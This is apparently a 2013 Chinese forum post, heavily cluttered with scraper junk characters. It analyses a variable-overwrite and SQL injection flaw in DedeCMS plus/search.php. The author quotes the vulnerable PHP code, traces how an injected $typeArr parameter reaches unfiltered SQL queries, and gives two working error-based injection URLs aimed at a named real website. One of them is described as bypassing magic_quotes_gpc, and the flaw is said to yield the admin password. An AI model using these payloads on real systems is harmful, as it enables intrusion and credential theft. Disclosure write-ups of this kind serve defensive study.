微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
) H9 B S: b, K+ [' G) I9 |作者: c4rp3nt3r@0x50sec.org
# t, u% \) f! ]* M& qDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
( _" s+ L+ X6 B9 Q6 V" c
8 ^3 s1 Z" Z: Q' G4 C" u0 V; B) j黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
+ u3 C8 [% W) y/ G4 A
5 s! E$ U2 m" s& O6 j============" c1 ]; B% j) ?, k2 G9 J5 H* h
* M, O# N" z% K5 \( F# @. s
7 L+ m, @* ?0 f" g9 I2 Y$ wDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.8 t* ~% M7 A2 ?: X% f
% d9 H) Q" O& J* \
require_once(dirname(__FILE__).”/../include/common.inc.php”);! R6 e2 y- o* d1 k4 v$ }
require_once(DEDEINC.”/arc.searchview.class.php”);7 i' B8 W& \) D6 n2 {% \9 ^' V
2 h0 B, \( q: R/ V6 p6 {$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
7 N) j( k0 E* @ M2 n# F" ]! E$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;8 N: T0 W4 k5 n) K, L3 P
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;7 V+ f ~% E5 i7 {
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
$ U6 c" }& B0 M) Z) @1 G1 ?$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
6 ~; A/ k! L0 ~' W 3 _$ ^: F( H: p2 i! W+ F {2 E
if(!isset($orderby)) $orderby=”;4 m2 l4 b$ O4 h! w' w4 j
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
0 O/ W" f! t Z3 X9 ~' n( K 3 p7 v5 {$ b. [/ `5 V' w, T
) ?" `( I. P! Y0 q( _* b) [9 r# B* G
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;; g w4 x* z2 ~9 |0 h8 F% ?1 j
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);/ D/ [5 A; u3 O) j6 u
$ t) J5 ]% ~, C# N3 E) i, Gif(!isset($keyword)){
' k4 ^; L) \3 o' K, a! l! F if(!isset($q)) $q = ”;# w/ ]8 H9 e4 B \
$keyword=$q;
9 x" i$ V2 t) T, k}
: W t% w- o; Z& S
# h3 P+ |' E9 y. a1 _# g$ j5 B0 Y$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));0 ]1 Z1 L9 ]. Z; G7 K
' g6 Q2 [8 \" f//查找栏目信息
8 G% O, K2 O. X/ Yif(empty($typeid))( y2 i, Q3 c9 N: B- t
{
, A* V! s! J1 }7 Z $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;8 \0 N! U$ E% M1 }. [2 q
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )2 ~! }7 ]( r: H9 m& o) P* W: W
{
7 Z# K7 k! D0 C; o: m L$ _6 \ $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);4 a3 k5 G; ~$ \! v! K
fwrite($fp, “<”.”?php\r\n”);
. ?- m3 }" ^/ W; B8 c1 Y( F0 b- V $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
5 v3 ^& u2 u7 K, `3 t# F $dsql->Execute();7 z' h Q9 A' V2 _5 A. R1 y8 e
while($row = $dsql->GetArray())
; U! h/ D( Q' p6 I+ ^ {8 i) S% L# n1 Q; D5 F: A
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
+ ]$ ?* N% f7 T- K6 H7 \ }
' \5 B# g) w4 s$ d7 f% W/ j4 ` fwrite($fp, ‘?’.'>’);- g1 ^1 W* Y& A! i: g- S# B3 g
fclose($fp);
1 x2 F9 n% b" I& f7 e5 q( u% m" a0 v }
( v; h; l u4 e- l //引入栏目缓存并看关键字是否有相关栏目内容' ^5 l* t" j/ A7 _0 U1 V8 H9 a
require_once($typenameCacheFile);# T7 D5 o) n5 n1 L! \
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个% x) z% }' [ s0 F% ?, F6 }6 {
//
, y: E6 h8 X: F if(isset($typeArr) && is_array($typeArr))
- C# d6 F/ j) z* `. q# b* d {
" m3 \% v8 Z# b" T Q foreach($typeArr as $id=>$typename)
) l/ P, F2 c6 |; A5 t, w {7 T7 y9 f% q& R7 X* e
3 e8 U: m+ h/ |( \! X
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
. {+ ? Q& L$ S: S4 b if($keyword != $keywordn)* l) _5 o0 b) x% M4 b3 V" B3 [9 \
{! A0 E. _( ^! L% H% \, P. B% A
$keyword = $keywordn;% g" @ [8 ^/ A# J2 R
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设- w5 [3 d( }2 W0 I
break;
7 {, F8 c% t% g& q6 n }3 ]7 M% C% w7 O( p) s
}2 j& R% l# I" J: u0 H( _
}
! }) e/ r- Q# R}8 n/ O2 z3 m+ D3 i$ w8 M
然后plus/search.php文件下面定义了一个 Search类的对象 .$ o' e0 r2 P( r* \" M1 {" h# o' E$ D
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
5 \, f6 ~) Y" K$this->TypeLink = new TypeLink($typeid);1 i: C- X# x& k
$ H7 Q5 E( J9 T7 lTypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
; s3 s2 R0 `; H0 S. w 1 u# V0 ?- k( V7 T) j8 I. g* l9 O
class TypeLink% n- Z$ L2 D/ X d" P
{/ ^6 ^- {. B& ?4 l+ p1 \
var $typeDir;
5 U8 G, ~ B* h& G2 S2 Q: E5 z var $dsql;$ R9 U' y4 Y6 O/ n/ V, d
var $TypeID;
* N5 q7 x4 R+ I$ m; H( f/ o var $baseDir;
3 v$ S; Z+ t% {1 j' ^8 a, G var $modDir;$ h9 K( c" u* \! u. N1 ]
var $indexUrl;$ C( M1 o6 H$ y) ]: Z9 u- y; y
var $indexName;
% b$ H& ^( ^8 \7 s var $TypeInfos;
\1 u7 S- @9 U. @$ c var $SplitSymbol;
G1 V5 L1 @1 L9 C, M var $valuePosition;
3 n7 H9 Q, P* r7 M var $valuePositionName;) C. K( J4 y# `: M$ _+ a
var $OptionArrayList;//构造函数///////
* n+ ?# p1 V/ U" @" p //php5构造函数4 c7 @0 ^0 q/ X. `4 m
function __construct($typeid). J8 t- l e+ v, s9 P& G, S
{9 E4 X2 L) b+ L$ k4 \1 \$ E* ~
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];8 u4 c! _0 u l. C+ L) y
$this->indexName = $GLOBALS['cfg_indexname'];
' N1 d; P2 `/ ]/ D/ H $this->baseDir = $GLOBALS['cfg_basedir'];
7 }! ~; R9 E$ J3 I( x! W $this->modDir = $GLOBALS['cfg_templets_dir'];2 {- x" H* {4 k( N! i
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
' b/ ^6 L+ ?- B $this->dsql = $GLOBALS['dsql'];' ~, u: ~/ a& N* ]8 V
$this->TypeID = $typeid;: {! F, J2 q& B9 H. v
$this->valuePosition = ”;& d7 f% d- ?$ w! a% c9 n, t$ o
$this->valuePositionName = ”;
* w8 D# {9 v; w8 e $this->typeDir = ”;" n/ ?4 R: p+ ]0 |8 c% m
$this->OptionArrayList = ”;
7 m* _' o& F4 H( D: ?2 j4 u 6 ^! s$ _: e, K
//载入类目信息
3 m/ q4 }2 c) q 2 Y6 L2 }/ W: {0 |4 _& v
<font color=”Red”>$query = “SELECT tp.*,ch.typename as* h) T: L$ i0 }* |2 s5 J
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
7 M% i- A4 S: A/ l2 i6 o8 I7 b8 D; G`#@__channeltype` ch0 z6 V6 U! k; o9 l
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿4 B, M i) D0 c! W5 ~
7 y& P; ?: n! J7 [ if($typeid > 0)
. N/ M9 P4 v* ]6 I6 A {, `9 o# U) x: v9 r7 c
$this->TypeInfos = $this->dsql->GetOne($query);/ ^9 O7 D9 p" r( E+ f' S* G: H& ?
利用代码一 需要 即使magic_quotes_gpc = Off! O) E7 V: W5 v
: b7 R; g) V9 H6 l8 H- I) \5 S
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
/ ]. k# Y9 z8 i+ L
( v0 R' I* | L1 |这只是其中一个利用代码… Search 类的构造函数再往下3 A" Z Z. X, ?, t' m( ~9 }. w
& N8 V% l2 U" c2 o7 k……省略
( z$ _/ j( E) o6 _$this->TypeID = $typeid;
( G/ M: I% @) v6 r* W2 ]……省略0 C! E4 @8 s/ H t
if($this->TypeID==”0″){
3 u. ~1 m @- ]: m/ [! ]3 ~( c8 p $this->ChannelTypeid=1;
' k6 l* Z9 R o; N* H }else{' ?( |6 F8 y& @) }$ v& b
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
) E1 F$ z2 J$ e9 U" X//现在不鸡肋了吧亲…
" S1 s9 K3 l/ q $this->ChannelTypeid=$row['channeltype'];
! ~% B# ~$ U, i- l( D" w3 I) S 9 W: s+ C# w: s; D$ j; e
}
2 R) B W9 S* z9 e- q利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
. Y8 _& U# c& f / ^" F0 x! ]! }4 c( m! N1 c; n
www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
& w6 L% H5 ~, p, C7 ~# D7 ~' i2 l
" Y/ Q Z0 @8 q如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
7 @7 s! b* d/ m, |/ j) I/ y5 A; M |
发表于 2013-1-19 08:18:56
收藏
支持
反对